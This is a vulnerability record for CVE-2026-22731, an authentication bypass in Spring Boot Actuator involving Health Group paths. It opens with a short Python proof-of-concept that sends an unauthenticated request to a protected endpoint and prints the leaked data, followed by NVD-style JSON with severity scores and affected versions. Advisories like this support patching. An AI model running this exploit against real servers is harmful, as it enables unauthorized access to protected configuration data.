CVE-2026-22731

import requests # Target URL construction based on vulnerable Health Group path configuration # Example: /health-group-path is configured for Health Group # An authenticated endpoint exists at /health-group-path/admin target_url = "http://vulnerable-host:8080/health-group-path/secret-config" # Sending unauthenticated request to exploit the bypass response = requests.get(target_url) if response.status_code == 200: print("[+] Authentication bypass successful!") print("[+] Data leaked:") print(response.text) else: print("[-] Exploit failed or target is patched.")

{"cve": {"id": "CVE-2026-22731", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:41.080", "lastModified": "2026-04-16T04:30:21.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spring Boot applications with Actuator can be vulnerable to an \"Authentication Bypass\" vulnerability when an application endpoint that requires authentication is declared under a specific path, already configured for a Health Group additional path.\nThis issue affects Spring Boot: from 4.0 before 4.0.3, from 3.5 before 3.5.11, from 3.4 before 3.4.15.\nThis CVE is similar but not equivalent to CVE-2026-22733, as the conditions for exploit and vulnerable versions are different."}, {"lang": "es", "value": "Las aplicaciones Spring Boot con Actuator pueden ser vulnerables a una vulnerabilidad de 'omisión de autenticación' cuando un endpoint de aplicación que requiere autenticación se declara bajo una ruta específica, ya configurada para una ruta adicional de un Grupo de Salud.\nEste problema afecta a Spring Boot: desde 4.0 antes de 4.0.3, desde 3.5 antes de 3.5.11, desde 3.4 antes de 3.4.15.\nEste CVE es similar pero no equivalente a CVE-2026-22733, ya que las condiciones para el exploit y las versiones vulnerables son diferentes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.15", "matchCriteriaId": "0ACB2610-CD68-4D6A-9C4C-0FA18E55E041"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.12", "matchCriteriaId": "2444685F-F529-45D4-91D6-4EDC9128024C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.4", "matchCriteriaId": "EF787BE2-58A8-442C-8165-9652D62C0829"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22731", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}